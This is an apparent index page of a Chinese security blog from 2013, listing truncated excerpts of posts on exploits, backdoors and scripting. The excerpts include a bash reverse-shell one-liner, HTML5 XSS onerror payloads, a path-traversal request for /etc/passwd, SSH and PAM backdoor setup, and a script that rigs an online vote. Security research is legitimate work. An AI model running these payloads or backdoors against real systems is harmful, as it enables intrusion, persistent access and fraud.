2013
11-19
11-19
vbs获取系统硬件信息小脚本
工作需要,需要获取win服务器的硬件信息,提交给一api 接口,最后用vbs实现了功能,主要是用到了WMI
发包是调用curl.exe来实现的,代码如下:
REM '获取IP地址'
REM '判断DNS是否为空,判断IP地址开头是否为10或192'
strComputer = "."
Set objWM.... Read More >
2013
11-07
11-07
python自动投票(新手学python)
前段时间看到黑马发起的2013年度创业家评选的网络投票活动,发现没有对单IP投票次数进行限制,可以无限次的投!
公司的大BOSS居然也在候选名单中,准备给大BOSS刷点票,写了个python自动投票脚本!主要用了httplib模块自动提交post请求.
贴上代码:
#!/usr/bin/env python
#coding=utf8
import httplib, urlli.... Read More >
2013
11-04
11-04
Zabbix漏洞利用工具(新手学python)
最近学习 python,先来无事,写了一个Zabbix的漏洞利用工具,主要用了BeatuifulSoup模块,使用的时候需要先安装这个模块!
Zabbix是一些大中型企业常用的一款服务器管理监控系统,能够监控服务器的状态,并且能够实现批量配置服务器,是一款很给力的系统!
贴上代码:
#coding:gbk
__author__ = 'nx4dm1n'
impo.... Read More >
2013
10-21
10-21
反弹shell的十种姿势
转载自 Wooyun Zone
作者:XSSER
bash版本:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
注意这个是由解析shell的bash完成,所以某些情况下不支持
perl版本:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >
2013
09-17
09-17
IT人爱心项目三:募捐助学–结束
很早以前发起的爱心项目三:募捐助学,因为中间有学生的暑假,导致一直到最近才将募捐所得的资金邮寄给那边的老师。
在lsh4ck,疯子,西毒,sky的响应支持下,才让该项目能顺利进行,非常感谢几位!
加上我自己捐的,一共募捐了600元,下面是老师传过来的照片:
有时候能够排除各.... Read More >
2013
09-10
09-10
Linux系统安全之ssh后门
1.ssh -V
#查看当前的ssh版本信息
#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
2.查找ssh的配置文件
一般都在/etc/ssh中
3.备份原来的文件的time
将/etc/ssh下的文件的备份
假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old.... Read More >
2013
09-10
09-10
linux系统安全之pam后门
本文由Sky原创投稿,请尊重劳动成果,转载注明出处!
测试环境:Centos 6.2 64位
0x01:查询本机的PAM版本
下载地址:
http://www.linux-pam.org/library/
https://fedorahosted.org/rel.... Read More >
今天是高富帅和白富美们不淡定的一天,IOS/Mac OS系统爆出了一个Bug,可以导致各种IM类型的APP崩溃。
该Bug是由于WebKit浏览器引擎导致的,受影响的系统有Mac OS 10.8和Ios 6,低于Ios 6和Ios 7、低于Mac OS10.8的版本不受该Bug影响。
任何使用了苹果的CoreText API渲染文本的浏览器或者应用程序都会受此Bug的影响,攻击字符串是.... Read More >
2013
08-16
08-16
Python实现自动登录网站
一段新手学习python的小程序,在圣哥指点下完成,主要功能是实现自动登录基调网络,并且完成打开WWW页面全屏显示的功能。
主要用到了Python Pamie模块,安装该模块需要先安装win32api模块,下面贴上具体的代码:
'''
Created on 2013-8-15
@author: Nx4dm1n
'''
#-.... Read More >
2013
08-11
08-11
浅谈内容欺骗漏洞
内容欺骗漏洞是指攻击者可以通过修改网页源代码,让访问者觉得是该功能或者该站点是可信合法的,来达到欺骗用户的目的。内容欺骗往往利用web服务的用户和组织之间建立的信任关系,意图是欺骗用户,达到钓鱼获取用户敏感信息的目的。
OWASP也将也被称为内容注射或者虚拟污损,内容欺骗漏洞攻击一般是和社会工.... Read More >
2013
07-18
07-18
struts2远程命令执行漏洞(s2-016)分析及防范
Struts2的官网在17号上午又公布了一个远程命令执行漏洞,随后各种版本的利用工具满天飞,对于wooyun和某些安全工程师童鞋来说,今天应该是备受压力和煎熬的一天!
17号上午11点空虚浪子心大牛的微博发了一条内容,随后经过各种大牛的转播,引爆了又一次的struts2远程命令执行漏洞换rank的浪潮!上一次struts2远程命令执行漏洞大爆发还要追溯到2012年5月份左右,同样wooyun.... Read More >
2013
07-10
07-10
HTML5下的XSS测试代码
国外某童鞋收集整理的针对HTML5的
XSS测试代码
<video> <source onerror=”javascript:alert(1)”>
引入媒体类测试代码Example:
<video onerror=”javascript:alert(1)”>.... Read More >
2013
06-27
06-27
dedecms之无节操webshell后门
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.
为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?
无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xx.... Read More >
2013
06-06
06-06
二维码(Qr Code):USSD指令恶意攻击
二维码(Qr code)最开始是专门为工业应用涉及的,后来在广告业得到普及。
一个典型的二维码可以包含:
* 电子版本的联系信息;
* 可以包含事件信息,扫描一个海报或者app上的二维码,可以自动现实地理位置或者下载操作等;
* 可以包含无线配置数据;
利用人的好奇心和.... Read More >
2013
05-30
05-30
十大互联网安全火狐插件
PC安全方面,浏览一直是数量庞大的网名面临的主要问题之一,本文将分享用于firefox的10大互联网安全插件,希望对大家的上网浏览安全阀那个面有所帮助。
Extended Cookie Manager(扩展Cookie管理器)
扩展cookie管理器可以允许或者封锁网站发送的cookies,还可以用来改编某些网站的cookie权限。
Roboform Password Manager
Ro.... Read More >
2013
05-10
05-10
建站之星sitestar v2.5文件包含漏洞利用及修复
无意间发现建站之星sitestar 的一鸡肋文件包含漏洞,WVS扫描一朋友的网站,发现提示有以下文件包含漏洞
index.php?_a=fullist&_m=../../../../../../../../../../etc/passwd%00.jpg
admin/index.php?_a=admin_list&_m=../../../../../../../../...... Read More >